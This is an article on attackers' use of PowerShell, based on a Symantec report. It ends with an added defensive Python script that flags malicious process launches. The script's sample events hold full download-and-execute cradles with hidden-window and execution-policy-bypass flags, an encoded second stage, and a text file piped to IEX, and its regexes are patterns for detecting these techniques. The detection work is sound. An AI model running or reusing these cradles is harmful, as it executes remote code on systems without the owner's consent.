Attackers have long leveraged other legitimate applications to compromise systems, but PowerShell is emerging as a favourite tool of malware authors.
Over 95 percent of the PowerShell scripts Symantec analysed turned out to be malicious, according to a Symantec report. PowerShell is the scripting language and shell framework installed by default on most Windows computers.
The flexibility of the framework lets attackers abuse it to download malicious payloads, perform reconnaissance, or move laterally across networks, the Symantec researchers said.
With 95.4 percent of the analysed PowerShell scripts being malicious, it is clear they represent a major threat to consumers and businesses, especially where externally sourced PowerShell scripts are involved. One caveat for anyone quoting the figure: it describes scripts submitted to a malware-analysis sandbox, a sample already skewed toward suspicious files, so it shows how thoroughly attackers have adopted the tool rather than how often a PowerShell script found on an ordinary endpoint is malicious.
Recently, the lion's share of targeted attacks have used PowerShell scripts, the researchers said.
PowerShell also enables fileless infection: a script can fetch code from a remote host and execute it directly in memory, so no payload is ever written to disk for file-based scanners to inspect. The actors behind banking Trojans and other types of threat have started to adopt it as well.
Symantec researchers said they observed cases in which Office macros and PowerShell scripts were used in combination to download the payload.
The most prevalent malware families currently taking advantage of PowerShell include W97M.Downloader (9.4 percent of all analyzed samples), Trojan.Kovter (4.5 percent), and JS.Downloader (4 percent), the security company notes in a report that focuses specifically on the use of PowerShell in attacks.
The numbers come from the Symantec Blue Coat Malware Analysis sandbox, which saw 49,127 PowerShell scripts submitted this year alone. The security researchers also manually analyzed 4,782 samples that represent 111 malware families that abuse the PowerShell command line.
The number of received samples increased sharply in 2016, mainly fuelled by an increase in the activity of JS.Downloader and Kovter. In the second quarter of the year, Symantec's sandbox received 14 times as many PowerShell samples as in the previous quarter, and the third quarter brought a further 22-fold increase over the second.
Attackers mostly use their PowerShell scripts post-compromise, to download additional payloads, and they also employ various techniques to ensure the scripts are executed, such as giving scripts an extension other than .ps1, since .ps1 files are usually blocked, Symantec said. A practical detail for defenders: PowerShell's -File switch refuses to run anything that does not end in .ps1, so a disguised script is typically read with Get-Content and piped to Invoke-Expression, which means the tell-tale is the odd extension in the command line rather than the script file itself.
Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload, Symantec said. Attackers layer the infection this way in an attempt to bypass security protections, since a defence that inspects only the first stage never sees the payload.
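The techniques described above (Office macros launching PowerShell, fileless download-and-execute cradles, scripts hidden behind non-.ps1 extensions, and an extra stage hidden in an encoded command line) all leave traces in process-creation telemetry. The following is an added example, not code from Symantec or from the report, of how an analyst might triage such records. It assumes a minimal record shape with a parent image path and a command line (the fields a Sysmon event 1 or Windows 4688 event provides); the rule patterns, the rule names and the sample events are all constructed for illustration and are not Symantec's detection logic.

```python
"""Triage PowerShell process launches for the evasions described in the article.

Added example: the record format, rules and sample events below are assumptions
for illustration, not Symantec's signatures or real telemetry.
"""
import base64
import re
from typing import Dict, List, Optional

# Parents that should rarely spawn PowerShell: a macro-launched PowerShell shows up here.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Rule patterns (assumed for this example).
RE_DOWNLOAD = re.compile(
    r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient")
RE_IN_MEMORY = re.compile(r"(?i)\bIEX\b|Invoke-Expression")
RE_EVASION = re.compile(
    r"(?i)-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass")
# -EncodedCommand and its short forms carry base64 of a UTF-16LE script.
RE_ENCODED = re.compile(r"(?i)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})")
# A script path handed to -File or read with Get-Content/gc; group 2 is its extension.
# -File itself refuses non-.ps1 names, so the usual trick is Get-Content <file> | IEX.
RE_SCRIPT_ARG = re.compile(
    r"(?i)(?:-f(?:ile)?|\bget-content|\bgc)\s+['\"]?([^\s'\"]+\.([a-z0-9]{1,4}))")
SCRIPT_EXTENSIONS = {"ps1", "psm1", "psd1"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind an -EncodedCommand argument, or None if absent/invalid."""
    m = RE_ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the rule names an event triggers; an empty list means nothing suspicious."""
    hits: List[str] = []

    def hit(name: str) -> None:
        if name not in hits:
            hits.append(name)

    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        hit("office_parent")

    # Layer 0 is the visible command line; layer 1 is what -EncodedCommand hides,
    # so a cradle tucked inside the encoded stage is still caught.
    layers = [event["cmdline"]]
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        hit("encoded_command")
        layers.append(decoded)

    for text in layers:
        downloads = RE_DOWNLOAD.search(text) is not None
        if downloads and RE_IN_MEMORY.search(text):
            hit("fileless_cradle")  # fetched code runs via IEX and never touches disk
        elif downloads:
            hit("downloader")
        if RE_EVASION.search(text):
            hit("evasion_flags")
        m = RE_SCRIPT_ARG.search(text)
        if m and m.group(2).lower() not in SCRIPT_EXTENSIONS:
            hit("disguised_script:" + m.group(2).lower())
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> triggered rules, keeping only events that fired at least one."""
    results: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = analyze(event)
        if hits:
            results[i] = hits
    return results


# Constructed sample records (not real telemetry). Event 1 hides a second-stage
# download cradle inside an encoded command, as in the multi-stage attacks described.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.txt')"
STAGE2_B64 = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": 'powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -c "IEX '
                '(New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage1.txt\')"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + STAGE2_B64},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": 'powershell.exe -ExecutionPolicy Bypass -Command "Get-Content C:\\Users\\Public\\invoice.txt | IEX"'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
        print("   ", SAMPLE_EVENTS[idx]["cmdline"][:90])
```

Run against the samples, the two benign launches (a .ps1 run from Explorer and an interactive Get-Service) produce no findings, while the macro-spawned cradle, the encoded second stage and the .txt piped to IEX each fire the rules that match the technique. The point of decoding the -EncodedCommand layer before applying the other rules is exactly the multi-stage problem: a rule that only reads the visible command line sees a harmless-looking base64 blob and misses the download cradle inside it.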
Apart from downloading payloads, malicious PowerShell scripts have performed various tasks such as uninstalling security products, detecting sandboxed environments, or sniffing the network for passwords.